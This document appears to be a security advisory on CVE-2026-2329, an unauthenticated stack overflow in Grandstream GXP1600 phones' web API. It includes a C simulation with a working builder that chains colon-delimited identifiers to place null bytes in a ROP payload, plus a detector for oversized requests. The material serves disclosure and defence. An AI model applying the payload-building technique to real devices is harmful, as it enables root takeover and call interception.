Vulnerability Overview
On February 18, 2026, Rapid7 Labs disclosed a critical vulnerability affecting the entire Grandstream GXP1600 series of Voice over Internet Protocol (VoIP) phones. Tracked as CVE-2026-2329, the flaw is a stack-based buffer overflow in the device's web-based API service that allows an unauthenticated remote attacker to execute arbitrary code as root on the phone.
The vulnerability is present in the device's unauthenticated web API endpoint and is accessible in a default configuration. A maliciously crafted HTTP POST request triggers the overflow, giving the attacker control over the program counter and ultimately full command execution on the underlying operating system.
Security researcher Stephen Fewer of Rapid7 discovered the vulnerability during a targeted zero-day research initiative. A working Metasploit exploit module and a companion post-exploitation module for credential extraction have been developed and are publicly available on GitHub.
Technical Details
CVE-2026-2329 is a stack-based buffer overflow vulnerability in the gs_web binary, a 32-bit ARM (Little Endian) native code process that implements both the web administration interface and the API on Grandstream GXP1600 series phones. The vulnerable endpoint, /cgi-bin/api.values.get, is designed to accept an HTTP POST parameter called "request" containing a colon-delimited list of identifiers to retrieve configuration values from the device.
Internally, the function that parses this parameter iterates character by character and copies each identifier into a 64-byte stack buffer. When a colon character is encountered, the buffer is null-terminated, processed, and reset for the next identifier. The critical flaw is that no bounds checking is performed on the length of each identifier before it is written to the buffer, allowing an attacker to overflow past the 64-byte boundary and corrupt adjacent stack memory.
This stack corruption gives the attacker direct control over multiple CPU registers, including the Program Counter (PC), effectively allowing arbitrary code execution when the vulnerable function returns. The endpoint requires no authentication and is accessible in a default device configuration.
Analysis of the gs_web binary shows that it has no stack canaries, that NX (No Execute) is enabled, and that it is not compiled as a Position Independent Executable (PIE). NX rules out running shellcode from the stack, so the attacker must chain ROP gadgets from the binary itself; without PIE those gadgets sit at fixed addresses. Because the binary is loaded at 0x00008000, every gadget address has the form 0x0000XXXX: the two most significant bytes of each 32-bit little-endian address are zero, and a parser that walks the parameter as a C string cannot copy a null byte. Rapid7 overcame this by exploiting the colon-delimited parsing behavior. Each identifier is null-terminated independently, at whatever offset it ends, so chaining multiple overflows with carefully sized identifiers places null bytes at precisely the offsets the ROP chain needs.
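The two mechanisms described above, the unchecked copy into the 64-byte buffer and the use of each identifier's terminator to place a null byte, can be made concrete in a model. The following C program is an added example written for this page, not code from Rapid7's module or from the gs_web binary. It simulates the stack as a flat array, shows the vulnerable copy loop beside a bounds-checked version, and builds a colon-delimited request that reproduces a payload containing null bytes by sending identifiers in decreasing length order. The 256-byte frame, the filler bytes, the function names and the two 0x0000XXXX addresses are assumptions chosen for illustration; the real stack layout and gadget addresses are not on this page.

```c
#include <stdio.h>
#include <string.h>

/* Added model of the parser described above (not Rapid7's or Grandstream's code).
 * frame[0..64) is the 64-byte identifier buffer; frame[64..FRAME_SIZE) stands for
 * the adjacent stack memory (saved registers, return address) an overflow corrupts. */
#define IDENT_BUF 64
#define FRAME_SIZE 256   /* assumed size of the simulated frame */

/* Vulnerable model: no check against IDENT_BUF; the terminator lands wherever the
 * identifier ended. Writes past FRAME_SIZE are dropped only to keep the demo safe. */
static size_t parse_request_vulnerable(const char *request, unsigned char frame[FRAME_SIZE])
{
    size_t pos = 0, count = 0;
    for (const char *p = request; ; p++) {
        if (*p == ':' || *p == '\0') {
            if (pos < FRAME_SIZE) frame[pos] = '\0';
            count++; pos = 0;                          /* reset for the next identifier */
            if (*p == '\0') break;
        } else {
            if (pos < FRAME_SIZE) frame[pos] = (unsigned char)*p;
            pos++;
        }
    }
    return count;
}

/* Hardened model: rejects an identifier that would not fit with its terminator.
 * Returns the identifier count, or -1 when the request is refused. */
static int parse_request_hardened(const char *request, char out[IDENT_BUF])
{
    size_t pos = 0; int count = 0;
    for (const char *p = request; ; p++) {
        if (*p == ':' || *p == '\0') {
            out[pos] = '\0';
            count++; pos = 0;
            if (*p == '\0') break;
        } else {
            if (pos >= IDENT_BUF - 1) return -1;       /* the bounds check the original lacks */
            out[pos++] = *p;
        }
    }
    return count;
}

/* Build a request that leaves `payload` (NULs allowed) at frame offset IDENT_BUF.
 * Identifiers go longest first: the first writes the whole image with 'A' standing in
 * for every NUL; each shorter one rewrites a prefix so its own terminator supplies one
 * NUL. Returns the request length, or -1 if payload holds ':' or does not fit. */
static int build_chained_request(const unsigned char *payload, size_t len,
                                 char *req, size_t req_cap)
{
    unsigned char image[FRAME_SIZE];
    size_t image_len = IDENT_BUF + len, out = 0;
    int first = 1;
    if (image_len >= FRAME_SIZE) return -1;
    memset(image, 'A', IDENT_BUF);                     /* filler for the legitimate buffer */
    memcpy(image + IDENT_BUF, payload, len);
    for (size_t i = 0; i < image_len; i++)
        if (image[i] == ':') return -1;                /* ':' would split the identifier */
    for (size_t k = image_len; ; k--) {
        if (k == image_len || image[k] == '\0') {      /* k is where a terminator must land */
            if (!first) { if (out + 1 >= req_cap) return -1; req[out++] = ':'; }
            if (out + k + 1 >= req_cap) return -1;
            for (size_t i = 0; i < k; i++)
                req[out++] = image[i] ? (char)image[i] : 'A';
            first = 0;
        }
        if (k == 0) break;
    }
    req[out] = '\0';
    return (int)out;
}

/* End to end: 1 if the vulnerable model leaves exactly `payload` past the buffer. */
static int demo_chain_places_nulls(const unsigned char *payload, size_t len)
{
    char req[4096]; unsigned char frame[FRAME_SIZE];
    memset(frame, 0xCC, sizeof frame);                 /* 0xCC marks untouched stack */
    if (build_chained_request(payload, len, req, sizeof req) < 0) return 0;
    parse_request_vulnerable(req, frame);
    return memcmp(frame + IDENT_BUF, payload, len) == 0;
}

int main(void)
{
    /* Constructed payload: 8 register-filler bytes, then two illustrative 32-bit
     * little-endian addresses in the non-PIE 0x0000XXXX range (not real gadgets). */
    static const unsigned char payload[] = { 'B','B','B','B','B','B','B','B',
                                             0xe0, 0xa5, 0x00, 0x00, 0x14, 0x91, 0x00, 0x00 };
    char req[4096], out[IDENT_BUF];
    int n = build_chained_request(payload, sizeof payload, req, sizeof req);
    if (n < 0) return 1;
    printf("%d-byte request; payload reproduced with its NULs: %s\n", n,
           demo_chain_places_nulls(payload, sizeof payload) ? "yes" : "no");
    printf("hardened parser: %d (-1 = rejected)\n", parse_request_hardened(req, out));
    return 0;
}
```

For the 16-byte payload the builder emits five identifiers of 80, 79, 78, 75 and 74 bytes plus four colons, a 390-byte request, and the hardened parser refuses it at the 64th byte of the first identifier. The ordering matters: a shorter identifier rewrites only a prefix of the frame, so the null bytes nearest the end of the payload have to be placed first. A payload byte equal to ':' cannot be delivered this way because it would split the identifier; the builder reports that rather than mis-encoding the chain.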
Affected Versions
All six models in the GXP1600 series share a common firmware image, meaning every device in the lineup is affected. The vulnerability is present in all firmware versions prior to 1.0.7.81.
| Model | Vulnerable Firmware | Fixed Firmware | Status |
|---|---|---|---|
| GXP1610 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available |
| GXP1615 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available |
| GXP1620 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available |
| GXP1625 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available |
| GXP1628 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available |
| GXP1630 | All versions < 1.0.7.81 | 1.0.7.81 | Patch Available |
Recommendations
- Update firmware immediately. Upgrade all GXP1600 series devices to firmware version 1.0.7.81 or later. The latest firmware is available from the Grandstream firmware downloads page.
- Restrict web interface access. Limit network access to the phone's web administration interface (TCP port 80) to trusted management subnets only using firewall rules or ACLs.
- Segment VoIP infrastructure. Place VoIP phones on a dedicated VLAN that is not directly accessible from untrusted networks or general user segments to reduce the attack surface.
- Monitor for exploitation attempts. Review proxy, IDS or packet-capture records for HTTP POST requests to /cgi-bin/api.values.get whose request parameter, after URL decoding, contains a single colon-delimited identifier of 64 bytes or more, which the 64-byte buffer cannot hold. Such requests indicate exploitation attempts.
- Audit SIP credentials. After patching, rotate any SIP account credentials and local user passwords stored on GXP1600 devices as a precaution against potential prior compromise.
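For the monitoring item above, here is an added C example, written for this page and not a Rapid7 or Grandstream tool, that applies the check to constructed request records: it URL-decodes the request parameter, measures the longest colon-delimited identifier, and flags a POST to /cgi-bin/api.values.get whose identifier reaches the 64-byte buffer size. The record format, the identifier names such as phone_status, and the 4096-byte field cap are assumptions; the page only states the endpoint, the parameter name, the delimiter and the buffer size.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Added detection example (not Rapid7's or Grandstream's code). Lengths are measured
 * after URL decoding: %41-style encoding triples the wire length of a short identifier
 * and would let a naive raw-length threshold misjudge a long one. */
#define IDENT_LIMIT 64
#define TARGET_PATH "/cgi-bin/api.values.get"
#define MAX_FIELD   4096   /* assumed cap on one decoded form field */

/* Percent-decode src into dst; '+' becomes a space. Returns the decoded length,
 * or -1 if it does not fit. */
static int url_decode(const char *src, unsigned char *dst, size_t dst_cap)
{
    size_t n = 0;
    for (const char *p = src; *p; p++) {
        if (n >= dst_cap) return -1;
        if (*p == '%' && isxdigit((unsigned char)p[1]) && isxdigit((unsigned char)p[2])) {
            char hex[3] = { p[1], p[2], '\0' };
            dst[n++] = (unsigned char)strtol(hex, NULL, 16);
            p += 2;
        } else {
            dst[n++] = (*p == '+') ? ' ' : (unsigned char)*p;
        }
    }
    return (int)n;
}

/* Longest identifier in the body's "request" field after decoding, split on ':' and
 * stopped at a decoded NUL as a C-string parser would. 0 if absent, MAX_FIELD if too long. */
static int longest_request_identifier(const char *body)
{
    for (const char *p = body; p && *p; ) {
        const char *end = strchr(p, '&');
        size_t field_len = end ? (size_t)(end - p) : strlen(p);
        if (field_len >= 8 && memcmp(p, "request=", 8) == 0) {
            char raw[MAX_FIELD]; unsigned char dec[MAX_FIELD];
            if (field_len - 8 >= sizeof raw) return MAX_FIELD;
            memcpy(raw, p + 8, field_len - 8); raw[field_len - 8] = '\0';
            int n = url_decode(raw, dec, sizeof dec);
            if (n < 0) return MAX_FIELD;
            int longest = 0, run = 0;
            for (int i = 0; i < n && dec[i] != '\0'; i++) {
                if (dec[i] == ':') { run = 0; continue; }
                if (++run > longest) longest = run;
            }
            return longest;
        }
        p = end ? end + 1 : NULL;
    }
    return 0;
}

/* One entry from a (constructed) proxy or IDS capture of HTTP requests. */
struct http_record { const char *method; const char *path; const char *body; };

/* 1 if the record is a POST to the vulnerable endpoint carrying an identifier of
 * IDENT_LIMIT bytes or more (a 64-byte identifier already puts its terminator past the buffer). */
static int is_suspicious(const struct http_record *r)
{
    if (strcmp(r->method, "POST") != 0) return 0;
    if (strncmp(r->path, TARGET_PATH, strlen(TARGET_PATH)) != 0) return 0;
    return longest_request_identifier(r->body) >= IDENT_LIMIT;
}

/* Build "request=<unit x reps>:phone_status" as a constructed body (names are made up). */
static void build_body(char *buf, size_t cap, const char *unit, int reps)
{
    size_t ulen = strlen(unit), n = (size_t)snprintf(buf, cap, "request=");
    for (int i = 0; i < reps && n + ulen + 1 < cap; i++, n += ulen)
        memcpy(buf + n, unit, ulen);
    snprintf(buf + n, cap - n, ":phone_status");
}

/* Run the constructed samples; returns how many were flagged (expected: 1). */
static int run_samples(void)
{
    char enc_short[1024], enc_long[1024], raw_long[1024];
    build_body(enc_short, sizeof enc_short, "%41", 36);  /* 108 chars on the wire, 36 decoded */
    build_body(enc_long,  sizeof enc_long,  "%41", 70);  /* decodes to a 70-byte identifier */
    build_body(raw_long,  sizeof raw_long,  "A",   70);
    const struct http_record samples[] = {
        { "POST", TARGET_PATH, "request=phone_status:line_status&format=json" },
        { "POST", TARGET_PATH, enc_short },
        { "POST", TARGET_PATH, enc_long },
        { "GET",  TARGET_PATH, raw_long },                /* wrong method for this check */
        { "POST", "/cgi-bin/other.cgi", raw_long },       /* hypothetical unrelated endpoint */
    };
    int flagged = 0;
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int hit = is_suspicious(&samples[i]);
        printf("%s %s -> %s\n", samples[i].method, samples[i].path, hit ? "SUSPICIOUS" : "ok");
        flagged += hit;
    }
    return flagged;
}

int main(void) { return run_samples() == 1 ? 0 : 1; }
```

Of the five constructed records only the third is flagged: 36 percent-encoded bytes look like 108 on the wire but decode to a harmless 36-byte identifier, while 70 encoded bytes decode to an overflow. The check looks only at POST bodies because that is what the advisory describes; if the handler also reads the parameter from a query string, apply the same measurement there.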
Context
VoIP phones are increasingly targeted by threat actors due to their always-on network presence, often limited security monitoring, and the sensitive nature of voice communications they handle. Successful exploitation of CVE-2026-2329 not only provides root-level access to the device itself but also enables call interception by reconfiguring the phone's SIP proxy to route traffic through an attacker-controlled server.
Rapid7 developed a SIP proxy tool for testing and auditing SIP infrastructure, which is available on GitHub. The vulnerability was disclosed in accordance with Rapid7's vulnerability disclosure policy, with coordinated vendor notification beginning on January 6, 2026 and public disclosure on February 18, 2026.